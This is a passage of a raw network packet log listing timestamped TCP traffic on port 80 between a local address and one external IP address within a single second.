Nov 18, 2023 10:02:37.144582987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144598007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144601107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144623041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144630909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144640923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144654989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144659042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144676924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144680023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144697905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144715071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144723892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144731998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144747972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144757986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144766092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144783020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144790888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144803047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144819975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144835949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144845963 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144853115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144864082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144870996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144887924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144900084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144905090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144922018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144928932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144937992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144956112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144967079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144973040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144992113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145001888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.145009995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145026922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145035982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.145044088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145060062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145073891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.145102978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145118952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145140886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145148039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.145159006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145173073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.145175934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145196915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145206928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.145214081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145231009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145253897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.145257950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.145281076 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.147902966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.147922993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.147984028 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.152884960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.152904987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.152923107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.152947903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.152970076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.152971983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.152987957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153037071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153039932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.153053045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153070927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153088093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153100967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.153105974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153121948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153131962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.153139114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153156042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153166056 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.153172970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153198004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.153887987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153915882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153934002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.153964996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154000998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154026985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154046059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154062033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154078960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154098034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154114962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154145956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154176950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154179096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154210091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154242039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154251099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154335022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154351950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154369116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154385090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154402018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154409885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154431105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154444933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154483080 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154500008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154515982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154532909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154550076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154558897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154566050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154582024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154593945 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154597998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154617071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154632092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154647112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154648066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154664993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154678106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154683113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154697895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154700041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154716015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154731989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154750109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154755116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154766083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154782057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154798031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154798031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154814959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154824972 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154831886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154850006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154865980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154872894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154881954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154897928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154910088 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154913902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154931068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154932022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154947042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154963017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154968977 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.154978991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.154994965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155009031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155019045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155035019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155047894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155051947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155075073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155076027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155091047 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155116081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155132055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155148983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155164957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155179977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155185938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155195951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155211926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155227900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155229092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155245066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155258894 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155260086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155277967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155293941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155311108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155316114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155328035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155344963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155361891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155361891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155379057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155389071 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155395031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155411959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155428886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155437946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155445099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155462027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155472040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155478001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155493021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155495882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155514002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155529976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155546904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155548096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155565023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155580997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155591965 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155599117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155616045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155626059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155632973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155648947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155666113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155673981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155708075 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155786037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155883074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155899048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155915022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155930996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155939102 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155947924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155963898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155966043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.155981064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155997038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.155997038 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156014919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156025887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156032085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156049967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156060934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156065941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156083107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156097889 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156099081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156116009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156131029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156140089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156147003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156162977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156174898 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156179905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156192064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156197071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156212091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156229019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156229973 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156245947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156264067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156270981 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156280994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156302929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156311989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156335115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156352043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156368971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156387091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156398058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156404018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156423092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156439066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156450033 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156455994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156474113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156488895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156493902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156506062 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156508923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156526089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156542063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156546116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156557083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156573057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156580925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156589031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156599045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156605005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156621933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156637907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156642914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156655073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156671047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156675100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156688929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156698942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156706095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156722069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156733036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156738043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156754971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156769037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156771898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156790018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156794071 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156805992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156821966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156837940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156837940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156855106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156864882 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156872034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156888008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156903982 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156913996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156922102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156939983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156941891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156960011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156970024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.156976938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.156994104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157011032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157027006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157027006 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157043934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157061100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157063007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157078028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157082081 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157094955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157105923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157110929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157128096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157143116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157144070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157159090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157176018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157181978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157193899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157201052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157210112 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157226086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157252073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157269001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157274008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157285929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157300949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157308102 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157316923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157334089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157351971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157358885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157367945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157385111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157392979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157402039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.157413960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.157418013 CET	80	49744	194.49.94.120	192.168.2.4
